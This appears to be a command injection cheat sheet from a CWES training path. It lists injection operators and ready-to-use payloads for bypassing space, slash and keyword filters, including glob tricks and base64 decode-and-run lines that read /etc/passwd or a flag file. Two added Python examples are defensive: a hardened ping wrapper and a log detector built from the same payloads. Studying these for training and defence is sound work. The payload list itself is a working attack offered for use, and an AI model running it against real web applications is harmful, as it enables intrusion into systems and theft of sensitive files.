Command Injection
OS command injection from the CWES path: every injection operator (raw and URL-encoded), space/slash/semicolon bypasses, command obfuscation, glob matching, and base64 combined bypasses. Every payload is listed separately.
Attack order
- Append each operator after the normal value, one at a time, until output appears: ; %0a && || & |
- Confirmed? Run id, hostname, cat /etc/passwd
- Space blocked? → %09 / ${IFS} / {cat,/etc/passwd}
- Slash/semicolon blocked? → ${PATH:0:1} (gives /), ${LS_COLORS:10:1} (gives ;)
- Keyword blocked? → quotes / $@ / backslash / case-flip / reverse
- Last resort → base64 decode-and-run
Injection operators
| Operator | Raw | URL-encoded | Behaviour |
|---|---|---|---|
| Semicolon | ; | %3b | runs both |
| Newline | \n | %0a | runs both |
| Background | & | %26 | runs both |
| Pipe | \| | %7c | runs both, only the second command's output is shown |
| AND | && | %26%26 | second runs only if first succeeds |
| OR | \|\| | %7c%7c | second runs only if first fails |
| Sub-shell | $() | %24%28%29 | runs inline, output substituted into the original command (Linux) |
Semicolon:
127.0.0.1; whoami
Newline URL-encoded (most reliable, rarely blacklisted):
127.0.0.1%0awhoami
AND URL-encoded:
127.0.0.1%26%26whoami
Sub-shell:
$(whoami)
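Added example (not from the cheat sheet or any project it describes): the defensive counterpart to the operator table above, in Python. The ping wrapper, the triage helper and the constructed sample inputs are assumptions for illustration. It shows why splicing the parameter into a shell string hands every operator in the table to /bin/sh, and how an allowlist parser plus an argv list (no shell) makes the same inputs inert.

```python
import ipaddress
import subprocess

# Constructed sample inputs: the first is legitimate, the rest are the
# operator payloads from the cheat sheet in raw form (after URL-decoding).
SAMPLE_INPUTS = [
    "127.0.0.1",
    "127.0.0.1; whoami",
    "127.0.0.1\nwhoami",
    "127.0.0.1&&whoami",
    "$(whoami)",
]


def vulnerable_command(host: str) -> str:
    # The classic bug: the untrusted value is spliced into a shell command
    # string, so every operator in the table is interpreted by /bin/sh.
    # Returned as a string for illustration; never pass this to a shell.
    return f"ping -c 1 {host}"


def validate_host(host: str) -> str:
    # Allowlist: the parameter must parse as an IP address and nothing else.
    # Operators, whitespace, quotes and sub-shell syntax all fail to parse.
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError as exc:
        raise ValueError(f"rejected host parameter: {host!r}") from exc


def build_ping_argv(host: str) -> list[str]:
    # argv list, never a shell string: the value becomes exactly one
    # argument, no shell runs, so ';', '|' and '$()' are just bytes.
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str) -> subprocess.CompletedProcess:
    # shell=False is already the default; spelled out to make the point.
    return subprocess.run(build_ping_argv(host), shell=False,
                          capture_output=True, text=True, timeout=5)


def triage(inputs: list[str]) -> dict[str, bool]:
    # Map each sample input to whether the hardened path accepts it.
    result = {}
    for value in inputs:
        try:
            build_ping_argv(value)
            result[value] = True
        except ValueError:
            result[value] = False
    return result


if __name__ == "__main__":
    for value, accepted in triage(SAMPLE_INPUTS).items():
        print(f"{value!r:24} -> {'accepted' if accepted else 'rejected'}")
```

The argv form is the fix; the allowlist is defence in depth so that a later refactor back to a shell string still fails closed. Note that validation alone is not enough when the value reaches the shell by another route (a cron job, a generated script), which is why both layers are shown.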
Space bypass
URL-encoded tab:
%09whoami
IFS variable:
cat${IFS}/etc/passwd
Brace expansion (no space needed):
{cat,/etc/passwd}
Slash / special char bypass
Extract / from PATH:
${PATH:0:1}
Extract ; from LS_COLORS (index 10 is ; only when LS_COLORS starts with the common rs=0:di=01;34 default; the variable is often unset in non-interactive shells, so check it expands before relying on it):
${LS_COLORS:10:1}
Command obfuscation (keyword filter bypass)
Quotes inside the command:
w'h'o'am'i
Dollar-at (expands to nothing):
who$@ami
Backslash:
w\ho\am\i
Case swap via tr:
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
Reverse the string:
$(rev<<<'imaohw')
Base64 decode-and-run (this string decodes to cat /etc/passwd | grep 33):
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
Glob matching (no keywords)
/???/??t matches /bin/cat (and any other three-letter name ending in t under a three-letter directory, so the expansion may not be unique):
/???/??t /etc/passwd
Combined bypasses (URL-encoded for GET)
Newline + base64 + tab (the string decodes to cat /flag.txt):
%0abash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)
Newline + cat with quotes + IFS + PATH slash:
%0ac'at'${IFS}${PATH:0:1}flag.txt
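Added example for the space, slash, obfuscation, glob and combined-bypass sections (not part of the original cheat sheet): a small Python detector that runs over constructed access-log lines carrying the payloads above. Parameter values are split on the raw & before being URL-decoded once, then matched against an indicator per bypass family, and a naive un-decoded check is kept alongside to show what it misses. The log lines, indicator names and regexes are assumptions chosen for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache-style, shortened). Lines 1-4 and 6
# carry payloads taken from the cheat sheet; lines 0 and 5 are benign.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?host=127.0.0.1 HTTP/1.1" 200 312',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /ping?host=127.0.0.1%0awhoami HTTP/1.1" 200 350',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /ping?host=127.0.0.1%26%26whoami HTTP/1.1" 200 350',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /ping?host=%0ac\'at\'${IFS}${PATH:0:1}flag.txt HTTP/1.1" 200 400',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /ping?host=%0abash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==) HTTP/1.1" 200 400',
    '10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=cats+and+dogs&page=2 HTTP/1.1" 200 900',
    '10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /ping?host=/???/??t%20/etc/passwd HTTP/1.1" 200 400',
]

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# One pattern per bypass family on the sheet, applied to the DECODED value.
INDICATORS = {
    "shell-operator":    re.compile(r"[;&|\n]|\$\("),                 # ; & | newline $()
    "space-substitute":  re.compile(r"\t|\$\{IFS\}|\{[^{}\s]*,[^{}\s]*\}"),  # %09, ${IFS}, {a,b}
    "env-substring":     re.compile(r"\$\{[A-Za-z_][A-Za-z0-9_]*:\d+:\d+\}"),  # ${PATH:0:1}
    "token-obfuscation": re.compile(r"\w['\\]\w|\$@|\btr\b.*<<<|\brev<<<"),    # w'h'o, w\ho, $@, tr/rev
    "decode-and-run":    re.compile(r"base64\s+-d|bash\s*<<<"),
    "glob-path":         re.compile(r"/\?{2,}/|/\?+[a-z]"),            # /???/??t
}


def extract_query(line: str) -> str:
    """Return the raw query string of the logged request, or '' if none."""
    m = REQUEST_LINE.search(line)
    if not m or "?" not in m.group(1):
        return ""
    return m.group(1).split("?", 1)[1]


def parse_query(raw_query: str) -> list[tuple[str, str, str]]:
    """Yield (name, raw_value, decoded_value). Split on the raw '&' first,
    then decode each value once: an attacker's %26 must land inside a
    single value, not become a parameter separator."""
    params = []
    for pair in raw_query.split("&"):
        if not pair:
            continue
        name, _, raw_value = pair.partition("=")
        params.append((name, raw_value, unquote_plus(raw_value)))
    return params


def classify(value: str) -> list[str]:
    """Sorted indicator names that fire on one decoded value."""
    return sorted(name for name, pat in INDICATORS.items() if pat.search(value))


def naive_raw_check(raw_query: str) -> bool:
    """The blacklist many apps ship: operators looked up in the un-decoded
    value. It never sees %0a, %09 or %26, which is why the sheet calls the
    encoded newline 'rarely blacklisted'."""
    return any(re.search(r"[;&|\n]|\$\(", raw) for _, raw, _ in parse_query(raw_query))


def scan(lines: list[str]) -> dict[int, list[str]]:
    """Map line index -> sorted indicator names fired by any parameter."""
    hits = {}
    for i, line in enumerate(lines):
        fired = set()
        for _, _, decoded in parse_query(extract_query(line)):
            fired.update(classify(decoded))
        if fired:
            hits[i] = sorted(fired)
    return hits


if __name__ == "__main__":
    for i, names in scan(LOG_LINES).items():
        print(f"line {i}: {', '.join(names)}")
```

Decode exactly once and only after splitting on the real separator; decoding twice reintroduces the %26 confusion. The token-obfuscation pattern fires on apostrophes in free text, so scope it to parameters that legitimately never contain quotes (hostnames, IPs, IDs) rather than search boxes.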